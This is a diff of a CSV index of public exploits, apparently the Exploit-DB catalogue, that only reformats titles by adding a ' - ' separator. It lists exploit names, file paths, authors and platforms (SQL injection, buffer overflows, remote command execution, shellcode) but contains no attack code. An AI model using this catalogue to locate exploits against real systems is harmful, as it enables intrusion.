Disclosure/Download",2010-05-12,Dr_IDE,windows,remote,0 12582,platforms/windows/remote/12582.txt,"Zervit Web Server 0.4 - Directory Traversals",2010-05-12,Dr_IDE,windows,remote,0 -12583,platforms/php/webapps/12583.txt,"e-webtech (fixed_page.asp) SQL Injection",2010-05-12,FL0RiX,php,webapps,0 +12583,platforms/php/webapps/12583.txt,"e-webtech - (fixed_page.asp) SQL Injection",2010-05-12,FL0RiX,php,webapps,0 12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 - (fckeditor) Remote Arbitrary File Upload",2010-05-12,eidelweiss,php,webapps,0 12585,platforms/php/webapps/12585.txt,"4Images <= 1.7.7 - (image_utils.php) Remote Command Execution",2010-05-12,"Sn!pEr.S!Te Hacker",php,webapps,0 12586,platforms/php/webapps/12586.php,"IPB 3.0.1 - SQL Injection Exploit",2010-05-13,Cryptovirus,php,webapps,0 @@ -11642,7 +11642,7 @@ id,file,description,date,author,platform,type,port 12762,platforms/freebsd/dos/12762.txt,"FreeBSD 8.0 ftpd off-by one PoC (FreeBSD-SA-10:05)",2010-05-27,"Maksymilian Arciemowicz",freebsd,dos,0 12763,platforms/php/webapps/12763.txt,"Script Upload Up Your Shell (Sql Inject)",2010-05-27,MouDy-Dz,php,webapps,0 12766,platforms/php/webapps/12766.txt,"PPhlogger <= 2.2.5 - (trace.php) Remote Command Execution",2010-05-27,"Sn!pEr.S!Te Hacker",php,webapps,0 -12767,platforms/php/webapps/12767.txt,"parlic Design (SQL/XSS/HTML) Multiple Vulnerabilities",2010-05-27,XroGuE,php,webapps,0 +12767,platforms/php/webapps/12767.txt,"parlic Design - (SQL/XSS/HTML) Multiple Vulnerabilities",2010-05-27,XroGuE,php,webapps,0 14321,platforms/windows/remote/14321.html,"Image22 ActiveX 1.1.1 - Buffer Overflow Exploit",2010-07-10,blake,windows,remote,0 12768,platforms/php/webapps/12768.txt,"Hampshire Trading Standards Script SQL Injection",2010-05-27,Mr.P3rfekT,php,webapps,0 12769,platforms/php/webapps/12769.txt,"Joomla Component MediQnA 1.1 - LFI",2010-05-27,kaMtiEz,php,webapps,0 @@ -11664,7 +11664,7 @@ id,file,description,date,author,platform,type,port 12788,platforms/php/webapps/12788.txt,"Marketing Web Design - Multiple Vulnerabilities",2010-05-29,XroGuE,php,webapps,0 12790,platforms/php/webapps/12790.txt,"Nucleus Plugin Twitter Remote File Inclusion",2010-05-29,AntiSecurity,php,webapps,0 12791,platforms/php/webapps/12791.txt,"Aim Web Design - Multiple Vulnerabilities",2010-05-29,XroGuE,php,webapps,0 -12792,platforms/php/webapps/12792.txt,"MileHigh Creative (SQL/XSS/HTML Injection) Multiple Vulnerabilities",2010-05-29,XroGuE,php,webapps,0 +12792,platforms/php/webapps/12792.txt,"MileHigh Creative - (SQL/XSS/HTML Injection) Multiple Vulnerabilities",2010-05-29,XroGuE,php,webapps,0 12793,platforms/php/webapps/12793.txt,"Cosmos Solutions CMS SQL Injection",2010-05-29,cyberlog,php,webapps,0 12794,platforms/php/webapps/12794.txt,"Cosmos Solutions CMS SQL Injection (id= / page=)",2010-05-29,gendenk,php,webapps,0 12796,platforms/php/webapps/12796.txt,"Joomla Component BF Quiz SQL Injection Exploit",2010-05-29,"Valentin Hoebel",php,webapps,0 @@ -11674,7 +11674,7 @@ id,file,description,date,author,platform,type,port 12803,platforms/windows/local/12803.html,"IP2location.dll 1.0.0.1 - Function Initialize() Buffer Overflow",2010-05-30,sinn3r,windows,local,0 12804,platforms/multiple/remote/12804.txt,"nginx http server <= 0.6.36 - Path Draversal",2010-05-30,"cp77fk4r ",multiple,remote,0 12805,platforms/php/webapps/12805.txt,"Zeeways Script - Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0 -12806,platforms/php/webapps/12806.txt,"CMScout (XSS/HTML Injection) Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0 +12806,platforms/php/webapps/12806.txt,"CMScout - (XSS/HTML Injection) Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0 12807,platforms/php/webapps/12807.txt,"Creato Script SQL Injection",2010-05-30,Mr.P3rfekT,php,webapps,0 12808,platforms/php/webapps/12808.txt,"PTC Site's RCE/XSS",2010-05-30,CrazyMember,php,webapps,0 12809,platforms/php/webapps/12809.txt,"Symphony CMS Local File Inclusion",2010-05-30,AntiSecurity,php,webapps,0 @@ -12326,7 +12326,7 @@ id,file,description,date,author,platform,type,port 13990,platforms/asp/webapps/13990.txt,"Boat Classifieds SQL Injection",2010-06-22,Sangteamtham,asp,webapps,0 13991,platforms/php/webapps/13991.txt,"Softbiz PHP FAQ Script Blind SQL Injection",2010-06-22,Sangteamtham,php,webapps,0 13992,platforms/php/webapps/13992.txt,"Pre PHP Classifieds SQL Injection",2010-06-22,Sangteamtham,php,webapps,0 -13993,platforms/php/webapps/13993.txt,"k-search (SQL/XSS) Multiple Vulnerabilities",2010-06-22,Sangteamtham,php,webapps,0 +13993,platforms/php/webapps/13993.txt,"k-search - (SQL/XSS) Multiple Vulnerabilities",2010-06-22,Sangteamtham,php,webapps,0 14512,platforms/php/webapps/14512.txt,"Concept E-commerce SQL Injection",2010-07-31,gendenk,php,webapps,0 13995,platforms/asp/webapps/13995.txt,"Boat Classifieds (printdetail.asp?Id) SQL Injection",2010-06-23,CoBRa_21,asp,webapps,0 13996,platforms/php/webapps/13996.txt,"Pre Multi-Vendor Shopping Malls (products.php?sid) SQL Injection",2010-06-23,CoBRa_21,php,webapps,0 @@ -12834,7 +12834,7 @@ id,file,description,date,author,platform,type,port 14645,platforms/php/webapps/14645.txt,"Sports Accelerator Suite 2.0 - (news_id) Remote SQL Injection",2010-08-14,LiquidWorm,php,webapps,0 14646,platforms/windows/dos/14646.py,"CA Advantage Ingres 2.6 - Multiple Buffer Overflow Vulnerabilities PoC",2010-08-14,fdiskyou,windows,dos,0 14647,platforms/php/webapps/14647.php,"PHP-Fusion Local File Inclusion",2010-08-15,MoDaMeR,php,webapps,0 -14648,platforms/php/webapps/14648.txt,"GuestBook Script PHP (XSS/HTML Injection) Multiple Vulnerabilities",2010-08-15,"AnTi SeCuRe",php,webapps,0 +14648,platforms/php/webapps/14648.txt,"GuestBook Script PHP - (XSS/HTML Injection) Multiple Vulnerabilities",2010-08-15,"AnTi SeCuRe",php,webapps,0 14651,platforms/windows/local/14651.py,"Rosoft media player 4.4.4 - SEH Buffer Overflow",2010-08-15,dijital1,windows,local,0 14650,platforms/php/webapps/14650.html,"Zomplog CMS 3.9 - Multiple XSS/CSRF Vulnerabilities",2010-08-15,10n1z3d,php,webapps,0 14654,platforms/php/webapps/14654.php,"CMSQLite <= 1.2 & CMySQLite <= 1.3.1 - Remote Code Execution Exploit",2010-08-15,BlackHawk,php,webapps,0 @@ -12971,7 +12971,7 @@ id,file,description,date,author,platform,type,port 14831,platforms/windows/local/14831.rb,"SnackAmp 3.1.2 - SMP Buffer Overflow (SEH)",2010-08-29,"James Fitts",windows,local,0 14832,platforms/windows/dos/14832.rb,"SnackAmp 3.1.2 - (.wav) Buffer Overflow (PoC)",2010-08-29,"James Fitts",windows,dos,0 14833,platforms/php/webapps/14833.txt,"vBulletin 3.8.4 & 3.8.5 Registration Bypass",2010-08-29,"Immortal Boy",php,webapps,0 -14834,platforms/php/webapps/14834.txt,"Max's Guestbook (HTML Injection/XSS) Multiple Vulnerabilities",2010-08-29,"MiND C0re",php,webapps,0 +14834,platforms/php/webapps/14834.txt,"Max's Guestbook - (HTML Injection/XSS) Multiple Vulnerabilities",2010-08-29,"MiND C0re",php,webapps,0 14835,platforms/php/webapps/14835.txt,"Multi-lingual E-Commerce System 0.2 - Multiple Remote File Inclusion Vulnerabilities",2010-08-29,JosS,php,webapps,0 14837,platforms/php/webapps/14837.txt,"CF Image Hosting Script 1.3.8 - Remote File Inclusion",2010-08-29,"FoX HaCkEr",php,webapps,0 14838,platforms/php/webapps/14838.txt,"Seagull 0.6.7 - SQL Injection",2010-08-29,Sweet,php,webapps,0 @@ -12980,7 +12980,7 @@ id,file,description,date,author,platform,type,port 14841,platforms/php/webapps/14841.txt,"seagull 0.6.7 - Remote File Inclusion",2010-08-30,"FoX HaCkEr",php,webapps,0 14843,platforms/windows/dos/14843.txt,"Apple QuickTime '_Marshaled_pUnk' Backdoor Param Client-Side Arbitrary Code Execution",2010-08-30,"Ruben Santamarta ",windows,dos,0 14845,platforms/php/webapps/14845.txt,"Joomla Component (com_picsell) Local File Disclosure",2010-08-30,Craw,php,webapps,0 -14846,platforms/php/webapps/14846.txt,"Joomla Component (com_jefaqpro) Multiple Blind SQL Injection Vulnerabilities",2010-08-31,"Chip d3 bi0s",php,webapps,0 +14846,platforms/php/webapps/14846.txt,"Joomla Component (com_jefaqpro) - Multiple Blind SQL Injection Vulnerabilities",2010-08-31,"Chip d3 bi0s",php,webapps,0 14849,platforms/php/webapps/14849.py,"mBlogger 1.0.04 (viewpost.php) - SQL Injection Exploit",2010-08-31,"Ptrace Security",php,webapps,0 14854,platforms/php/webapps/14854.py,"Cpanel PHP - Restriction Bypass (0Day)",2010-09-01,Abysssec,php,webapps,0 14851,platforms/php/webapps/14851.txt,"dompdf 0.6.0 beta1 - Remote File Inclusion",2010-09-01,Andre_Corleone,php,webapps,0 @@ -13108,7 +13108,7 @@ id,file,description,date,author,platform,type,port 15035,platforms/windows/dos/15035.py,"Apple QuickTime FLI LinePacket - Remote Code Execution",2010-09-18,Abysssec,windows,dos,0 15037,platforms/php/webapps/15037.html,"CMSimple - CSRF",2010-09-18,Abysssec,php,webapps,0 15039,platforms/php/webapps/15039.txt,"xt:Commerce Gambio 2008 - 2010 ERROR Based SQL Injection 'reviews.php'",2010-09-18,secret,php,webapps,0 -15040,platforms/php/webapps/15040.txt,"Joomla Component (com_restaurantguide) Multiple Vulnerabilities",2010-09-18,Valentin,php,webapps,0 +15040,platforms/php/webapps/15040.txt,"Joomla Component - (com_restaurantguide) Multiple Vulnerabilities",2010-09-18,Valentin,php,webapps,0 15041,platforms/php/webapps/15041.py,"Maian Gallery 2 - Local File Download",2010-09-18,mr_me,php,webapps,0 15044,platforms/asp/webapps/15044.txt,"jmd-cms - Multiple Vulnerabilities",2010-09-19,Abysssec,asp,webapps,0 15046,platforms/php/webapps/15046.txt,"Fashione E-Commerce Webshop Multiple SQL Injection",2010-09-19,secret,php,webapps,0 @@ -13212,7 +13212,7 @@ id,file,description,date,author,platform,type,port 15186,platforms/ios/remote/15186.txt,"iOS FileApp < 2.0 - Directory Traversal",2010-10-02,m0ebiusc0de,ios,remote,0 15188,platforms/ios/dos/15188.py,"iOS FileApp < 2.0 - FTP Remote Denial of Service Exploit",2010-10-02,m0ebiusc0de,ios,dos,0 15189,platforms/asp/webapps/15189.txt,"SmarterMail 7.x - (7.2.3925) LDAP Injection",2010-10-02,sqlhacker,asp,webapps,0 -15191,platforms/asp/webapps/15191.txt,"TradeMC E-Ticaret (SQL/XSS) Multiple Vulnerabilities",2010-10-02,KnocKout,asp,webapps,0 +15191,platforms/asp/webapps/15191.txt,"TradeMC E-Ticaret - (SQL/XSS) Multiple Vulnerabilities",2010-10-02,KnocKout,asp,webapps,0 15194,platforms/php/webapps/15194.txt,"TinyMCE MCFileManager 2.1.2 - Arbitrary File Upload",2010-10-03,Hackeri-AL,php,webapps,0 15200,platforms/php/webapps/15200.txt,"FAQMasterFlex 1.2 - SQL Injection",2010-10-04,cyb3r.anbu,php,webapps,0 15201,platforms/windows/local/15201.rb,"SnackAmp 3.1.3B - SMP Buffer Overflow (SEH DEP Bypass)",2010-10-04,"Muhamad Fadzil Ramli",windows,local,0 @@ -13693,7 +13693,7 @@ id,file,description,date,author,platform,type,port 15770,platforms/php/webapps/15770.txt,"Download Center 2.2 - SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps,0 15771,platforms/php/webapps/15771.txt,"SchuldnerBeratung SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps,0 15772,platforms/php/webapps/15772.txt,"PayPal Shop Digital SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps,0 -15773,platforms/php/webapps/15773.txt,"Projekt Shop (details.php) Multiple SQL Injection Vulnerabilities",2010-12-18,"DeadLy DeMon",php,webapps,0 +15773,platforms/php/webapps/15773.txt,"Projekt Shop - (details.php) Multiple SQL Injection Vulnerabilities",2010-12-18,"DeadLy DeMon",php,webapps,0 15774,platforms/linux/local/15774.c,"Linux Kernel < 2.6.37-rc2 - ACPI custom_method Privilege Escalation",2010-12-18,"Jon Oberheide",linux,local,0 15775,platforms/php/webapps/15775.txt,"Mafia Game Script SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps,0 15776,platforms/asp/webapps/15776.pl,"Virtual Store Open 3.0 Acess SQL Injection",2010-12-18,Br0ly,asp,webapps,0 @@ -13868,7 +13868,7 @@ id,file,description,date,author,platform,type,port 16006,platforms/cgi/webapps/16006.html,"SmoothWall Express 3.0 - Multiple Vulnerabilities",2011-01-17,"dave b",cgi,webapps,0 16009,platforms/windows/local/16009.pl,"A-PDF All to MP3 Converter 2.0.0 - (.wav) Buffer Overflow Exploit",2011-01-18,h1ch4m,windows,local,0 16010,platforms/php/webapps/16010.txt,"allCineVid Joomla Component 1.0.0 - Blind SQL Injection",2011-01-18,"Salvatore Fresta",php,webapps,0 -16011,platforms/php/webapps/16011.txt,"CakePHP <= 1.3.5 - / 1.2.8 unserialize()",2011-01-18,felix,php,webapps,0 +16011,platforms/php/webapps/16011.txt,"CakePHP <= 1.3.5 / 1.2.8 - unserialize()",2011-01-18,felix,php,webapps,0 16013,platforms/php/webapps/16013.html,"N-13 News 3.4 - Remote Admin Add CSRF Exploit",2011-01-18,anT!-Tr0J4n,php,webapps,0 16014,platforms/windows/remote/16014.html,"Novell iPrint <= 5.52 - ActiveX GetDriverSettings() Remote Exploit (ZDI-10-256)",2011-01-19,Dr_IDE,windows,remote,0 17209,platforms/php/webapps/17209.txt,"SoftMP3 SQL Injection",2011-04-24,mArTi,php,webapps,0 @@ -14001,7 +14001,7 @@ id,file,description,date,author,platform,type,port 16175,platforms/php/webapps/16175.txt,"Seo Panel 2.2.0 - SQL Injection Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0 16177,platforms/windows/remote/16177.py,"ActFax Server FTP 4.25 Build 0221 (2010-02-11) - Remote BoF (Post Auth)",2011-02-16,chap0,windows,remote,0 16178,platforms/asp/webapps/16178.txt,"Rae Media Real Estate Single Agent SQL Injection",2011-02-16,R4dc0re,asp,webapps,0 -16179,platforms/asp/webapps/16179.txt,"Rae Media Real Estate Multi Agent SQL Injection",2011-02-16,R4dc0re,asp,webapps,0 +16179,platforms/asp/webapps/16179.txt,"Rae Media Real Estate Multi Agent - SQL Injection",2011-02-16,R4dc0re,asp,webapps,0 16180,platforms/windows/dos/16180.py,"BWMeter 5.4.0 - (.csv) Denial of Service",2011-02-17,b0telh0,windows,dos,0 16181,platforms/php/webapps/16181.txt,"WordPress User Photo Component - Remote File Upload",2011-02-17,ADVtools,php,webapps,0 16182,platforms/linux/dos/16182.txt,"PHP 5.3.5 - grapheme_extract() NULL Pointer Dereference",2011-02-17,"Maksymilian Arciemowicz",linux,dos,0 @@ -14126,7 +14126,7 @@ id,file,description,date,author,platform,type,port 16323,platforms/solaris_sparc/remote/16323.rb,"Solaris dtspcd Heap Overflow",2010-04-30,Metasploit,solaris_sparc,remote,0 16324,platforms/multiple/remote/16324.rb,"Solaris sadmind Command Execution",2010-06-22,Metasploit,multiple,remote,0 16325,platforms/solaris/remote/16325.rb,"Sun Solaris sadmind adm_build_path() Buffer Overflow",2010-07-03,Metasploit,solaris,remote,0 -16326,platforms/solaris/remote/16326.rb,"Solaris ypupdated Command Execution",2010-07-25,Metasploit,solaris,remote,0 +16326,platforms/solaris/remote/16326.rb,"Solaris - ypupdated Command Execution",2010-07-25,Metasploit,solaris,remote,0 16327,platforms/solaris/remote/16327.rb,"Solaris in.telnetd TTYPROMPT Buffer Overflow",2010-06-22,Metasploit,solaris,remote,0 16328,platforms/solaris/remote/16328.rb,"Sun Solaris Telnet Remote Authentication Bypass",2010-06-22,Metasploit,solaris,remote,0 16329,platforms/solaris/remote/16329.rb,"Samba lsa_io_trans_names Heap Overflow (Solaris)",2010-04-05,Metasploit,solaris,remote,0 @@ -14699,7 +14699,7 @@ id,file,description,date,author,platform,type,port 16897,platforms/php/webapps/16897.rb,"BASE - base_qry_common Remote File Include",2010-11-24,Metasploit,php,webapps,0 16899,platforms/php/webapps/16899.rb,"osCommerce 2.2 - Arbitrary PHP Code Execution",2010-07-03,Metasploit,php,webapps,0 16901,platforms/php/webapps/16901.rb,"PAJAX Remote Command Execution",2010-04-30,Metasploit,php,webapps,0 -16902,platforms/php/webapps/16902.rb,"CakePHP <= 1.3.5 - / 1.2.8 Cache Corruption Exploit",2011-01-14,Metasploit,php,webapps,0 +16902,platforms/php/webapps/16902.rb,"CakePHP <= 1.3.5 / 1.2.8 - Cache Corruption Exploit",2011-01-14,Metasploit,php,webapps,0 16903,platforms/php/remote/16903.rb,"OpenX banner-edit.php File Upload PHP Code Execution",2010-09-20,Metasploit,php,remote,0 16904,platforms/php/webapps/16904.rb,"Trixbox CE 2.6.1 - langChoice PHP Local File Inclusion",2011-01-08,Metasploit,php,webapps,0 16905,platforms/cgi/webapps/16905.rb,"AWStats (6.1-6.2) - configdir Remote Command Execution",2009-12-26,Metasploit,cgi,webapps,0 @@ -15679,7 +15679,7 @@ id,file,description,date,author,platform,type,port 18047,platforms/php/webapps/18047.txt,"JEEMA Sms 3.2 Joomla Component - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 18048,platforms/php/webapps/18048.txt,"Vik Real Estate 1.0 Joomla Component - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 18049,platforms/windows/dos/18049.txt,"Microsys PROMOTIC 8.1.4 - ActiveX GetPromoticSite Unitialized Pointer",2011-10-13,"Luigi Auriemma",windows,dos,0 -18050,platforms/php/webapps/18050.txt,"Joomla HM-Community (com_hmcommunity) Multiple Vulnerabilities",2011-10-31,"599eme Man",php,webapps,0 +18050,platforms/php/webapps/18050.txt,"Joomla HM-Community - (com_hmcommunity) Multiple Vulnerabilities",2011-10-31,"599eme Man",php,webapps,0 18051,platforms/windows/remote/18051.txt,"BroadWin WebAccess SCADA/HMI Client Remote Code Execution",2011-10-31,Snake,windows,remote,0 18052,platforms/windows/dos/18052.php,"Oracle DataDirect ODBC Drivers HOST Attribute arsqls24.dll Stack Based Buffer Overflow PoC",2011-10-31,rgod,windows,dos,0 18053,platforms/php/webapps/18053.txt,"WordPress Theme classipress <= 3.1.4 - Stored XSS",2011-10-31,"Paul Loftness",php,webapps,0 @@ -15770,7 +15770,7 @@ id,file,description,date,author,platform,type,port 18163,platforms/linux_mips/shellcode/18163.c,"Linux/MIPS - Add user(UID 0) _rOOt_ with password _pwn3d_ shellcode (164 bytes)",2011-11-27,rigan,linux_mips,shellcode,0 19400,platforms/php/webapps/19400.txt,"WordPress Website FAQ Plugin 1.0 - SQL Injection",2012-06-26,"Chris Kellum",php,webapps,0 18165,platforms/windows/dos/18165.txt,"siemens automation license manager <= 500.0.122.1 - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0 -18166,platforms/windows/dos/18166.txt,"Siemens SIMATIC WinCC Flexible (Runtime) Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0 +18166,platforms/windows/dos/18166.txt,"Siemens SIMATIC WinCC Flexible (Runtime) - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0 18167,platforms/php/webapps/18167.zip,"Bypass the JQuery-Real-Person captcha plugin (0Day)",2011-11-28,Alberto_García_Illera,php,webapps,0 18171,platforms/multiple/remote/18171.rb,"Java Applet Rhino Script Engine Remote Code Execution",2011-11-30,Metasploit,multiple,remote,0 18172,platforms/hardware/remote/18172.rb,"CTEK SkyRouter 4200 / 4300 - Command Execution",2011-11-30,Metasploit,hardware,remote,0 @@ -15809,7 +15809,7 @@ id,file,description,date,author,platform,type,port 18212,platforms/php/webapps/18212.txt,"phpBB MyPage Plugin SQL Injection",2011-12-07,CrazyMouse,php,webapps,0 18213,platforms/php/webapps/18213.php,"Traq <= 2.3 - Authentication Bypass / Remote Code Execution Exploit",2011-12-07,EgiX,php,webapps,0 18214,platforms/php/webapps/18214.py,"SMF <= 2.0.1 - SQL Injection & Privilege Escalation",2011-12-07,The:Paradox,php,webapps,0 -18220,platforms/windows/dos/18220.py,"CyberLink Multiple Products File Project Handling Stack Buffer Overflow PoC",2011-12-09,modpr0be,windows,dos,0 +18220,platforms/windows/dos/18220.py,"CyberLink Multiple Products - File Project Handling Stack Buffer Overflow PoC",2011-12-09,modpr0be,windows,dos,0 18221,platforms/linux/dos/18221.c,"Apache HTTP Server Denial of Service",2011-12-09,"Ramon de C Valle",linux,dos,0 18222,platforms/php/webapps/18222.txt,"SePortal 2.5 - SQL Injection",2011-12-09,Don,php,webapps,0 18223,platforms/windows/dos/18223.pl,"Free Opener Local Denial of Service",2011-12-09,"Iolo Morganwg",windows,dos,0 @@ -17076,7 +17076,7 @@ id,file,description,date,author,platform,type,port 19711,platforms/windows/dos/19711.txt,"Ipswitch IMail 5.0.8/6.0/6.1 IMonitor status.cgi DoS",2000-01-05,"Ussr Labs",windows,dos,0 19712,platforms/multiple/remote/19712.txt,"Allaire ColdFusion Server 4.0/4.0.1 - CFCACHE",2000-01-04,anonymous,multiple,remote,0 19713,platforms/cgi/remote/19713.pl,"Solution Scripts Home Free 1.0 - search.cgi Directory Traversal",2000-01-03,"k0ad k1d",cgi,remote,0 -40086,platforms/ruby/remote/40086.rb,"Ruby on Rails ActionPack Inline ERB Code Execution",2016-07-11,Metasploit,ruby,remote,80 +40086,platforms/ruby/remote/40086.rb,"Ruby on Rails ActionPack Inline ERB - Code Execution",2016-07-11,Metasploit,ruby,remote,80 19715,platforms/php/webapps/19715.txt,"WordPress WP-Predict Plugin 1.0 - Blind SQL Injection",2012-07-10,"Chris Kellum",php,webapps,0 19716,platforms/windows/dos/19716.txt,"Checkpoint Abra - Multiple Vulnerabilities",2012-07-10,"Andrey Komarov",windows,dos,0 19717,platforms/java/remote/19717.rb,"Java Applet Field Bytecode Verifier Cache Remote Code Execution",2012-07-11,Metasploit,java,remote,0 @@ -17591,8 +17591,8 @@ id,file,description,date,author,platform,type,port 20255,platforms/windows/dos/20255.txt,"Microsoft Windows NT 4.0 / 2000 LPC Zone Memory Depletion DoS",2000-10-03,"BindView's Razor Team",windows,dos,0 20256,platforms/openbsd/local/20256.c,"OpenBSD 2.x fstat Format String",2000-10-04,K2,openbsd,local,0 20257,platforms/windows/local/20257.txt,"Microsoft Windows NT 4.0 / 2000 Predictable LPC Message Identifier - Multiple Vulnerabilities",2000-10-03,"BindView's Razor Team",windows,local,0 -20258,platforms/multiple/remote/20258.c,"HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 RPC.YPUpdated Command Execution (1)",1994-02-07,"Josh D",multiple,remote,0 -20259,platforms/multiple/remote/20259.txt,"HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 RPC.YPUpdated Command Execution (2)",1994-02-07,anonymous,multiple,remote,0 +20258,platforms/multiple/remote/20258.c,"HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 - RPC.YPUpdated Command Execution (1)",1994-02-07,"Josh D",multiple,remote,0 +20259,platforms/multiple/remote/20259.txt,"HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 - RPC.YPUpdated Command Execution (2)",1994-02-07,anonymous,multiple,remote,0 20260,platforms/php/webapps/20260.txt,"Islamnt Islam Forum Script 1.2 - Blind SQL Injection Exploit",2012-08-05,s3n4t00r,php,webapps,0 20543,platforms/windows/local/20543.rb,"Windows Service Trusted Path Privilege Escalation",2012-08-15,Metasploit,windows,local,0 20500,platforms/php/remote/20500.rb,"TestLink 1.9.3 - Arbitrary File Upload",2012-08-15,Metasploit,php,remote,0 @@ -17798,7 +17798,7 @@ id,file,description,date,author,platform,type,port 20468,platforms/multiple/remote/20468.txt,"Inktomi Search Software 3.0 Information Disclosure",2000-12-05,"china nsl",multiple,remote,0 20469,platforms/unix/remote/20469.txt,"Endymion MailMan 3.0.x - Remote Arbitrary Command Execution",2000-12-06,"Secure Reality Advisories",unix,remote,0 20470,platforms/windows/dos/20470.txt,"IBM DB2 - Universal Database for Windows NT 6.1/7.1 SQL DoS",2000-12-05,benjurry,windows,dos,0 -21316,platforms/php/webapps/21316.txt,"ASTPP VoIP Billing (4cf207a) Multiple Vulnerabilities",2012-09-14,Vulnerability-Lab,php,webapps,0 +21316,platforms/php/webapps/21316.txt,"ASTPP VoIP Billing (4cf207a) - Multiple Vulnerabilities",2012-09-14,Vulnerability-Lab,php,webapps,0 20472,platforms/multiple/remote/20472.txt,"IBM DB2 - Universal Database for Linux 6.1/Windows NT 6.1 Known Default Password",2000-12-05,benjurry,multiple,remote,0 20473,platforms/hardware/dos/20473.pl,"Cisco Catalyst 4000 4.x/5.x_Catalyst 5000 4.5/5.x_Catalyst 6000 5.x Memory Leak DoS",2000-12-06,blackangels,hardware,dos,0 20474,platforms/php/webapps/20474.txt,"WordPress RSVPMaker 2.5.4 - Persistent XSS",2012-08-13,"Chris Kellum",php,webapps,0 @@ -18135,9 +18135,9 @@ id,file,description,date,author,platform,type,port 20828,platforms/windows/dos/20828.txt,"SpyNet 6.5 Chat Server Multiple Connection Denial of Service",2001-05-07,nemesystm,windows,dos,0 20829,platforms/windows/remote/20829.txt,"T. Hauck Jana Server 1.45/1.46 Hex Encoded Directory Traversal",2001-05-07,neme-dhc,windows,remote,0 20830,platforms/windows/dos/20830.txt,"T. Hauck Jana Server 1.45/1.46/2.0 - MS-DOS Device Name DoS",2001-05-07,neme-dhc,windows,dos,0 -20831,platforms/cgi/remote/20831.txt,"Drummond Miles A1Stats 1.0 a1disp2.cgi Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0 -20832,platforms/cgi/remote/20832.txt,"Drummond Miles A1Stats 1.0 a1disp3.cgi Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0 -20833,platforms/cgi/remote/20833.txt,"Drummond Miles A1Stats 1.0 a1disp4.cgi Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0 +20831,platforms/cgi/remote/20831.txt,"Drummond Miles A1Stats 1.0 - a1disp2.cgi Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0 +20832,platforms/cgi/remote/20832.txt,"Drummond Miles A1Stats 1.0 - a1disp3.cgi Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0 +20833,platforms/cgi/remote/20833.txt,"Drummond Miles A1Stats 1.0 - a1disp4.cgi Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote,0 20834,platforms/windows/dos/20834.txt,"ElectroSoft ElectroComm 1.0/2.0 - Denial of Service",2001-05-07,nemesystm,windows,dos,0 20835,platforms/windows/remote/20835.c,"Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (1)",2001-05-15,"Filip Maertens",windows,remote,0 20836,platforms/windows/remote/20836.c,"Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (2)",2001-05-16,HuXfLuX,windows,remote,0 @@ -19180,7 +19180,7 @@ id,file,description,date,author,platform,type,port 21912,platforms/php/webapps/21912.txt,"Killer Protection 1.0 Information Disclosure",2002-10-07,frog,php,webapps,0 21913,platforms/windows/remote/21913.txt,"Citrix Published Applications - Information Disclosure",2002-10-07,wire,windows,remote,0 21914,platforms/asp/webapps/21914.txt,"SSGBook 1.0 Image Tag HTML Injection Vulnerabilities",2002-10-08,frog,asp,webapps,0 -21915,platforms/windows/dos/21915.txt,"Symantec Norton Personal Firewall 2002/ Kaspersky Labs Anti-Hacker 1.0/BlackIce Server Protection 3.5/BlackICE Defender 2.9 - Auto Block DoS Weakness",2002-10-08,"Yiming Gong",windows,dos,0 +21915,platforms/windows/dos/21915.txt,"Symantec Norton Personal Firewall 2002/Kaspersky Labs Anti-Hacker 1.0/BlackIce Server Protection 3.5/BlackICE Defender 2.9 - Auto Block DoS Weakness",2002-10-08,"Yiming Gong",windows,dos,0 33403,platforms/windows/dos/33403.py,"Intellicom 1.3 - 'NetBiterConfig.exe' 'Hostname' Data Remote Stack Buffer Overflow",2009-12-14,"Ruben Santamarta ",windows,dos,0 21918,platforms/php/webapps/21918.html,"VBZoom 1.0 - Remote SQL Injection",2002-10-08,hish,php,webapps,0 21919,platforms/unix/remote/21919.sh,"Sendmail 8.12.6 Trojan Horse",2002-10-08,netmask,unix,remote,0 @@ -19302,7 +19302,7 @@ id,file,description,date,author,platform,type,port 22038,platforms/php/webapps/22038.txt,"Sisfokol 4.0 - Arbitrary File Upload",2012-10-17,"cr4wl3r ",php,webapps,0 22039,platforms/php/webapps/22039.txt,"symphony CMS 2.3 - Multiple Vulnerabilities",2012-10-17,Wireghoul,php,webapps,0 22040,platforms/jsp/webapps/22040.txt,"ManageEngine Support Center Plus <= 7908 - Multiple Vulnerabilities",2012-10-17,xistence,jsp,webapps,0 -22041,platforms/multiple/webapps/22041.txt,"Oracle WebCenter Sites (FatWire Content Server) Multiple Vulnerabilities",2012-10-17,"SEC Consult",multiple,webapps,0 +22041,platforms/multiple/webapps/22041.txt,"Oracle WebCenter Sites (FatWire Content Server) - Multiple Vulnerabilities",2012-10-17,"SEC Consult",multiple,webapps,0 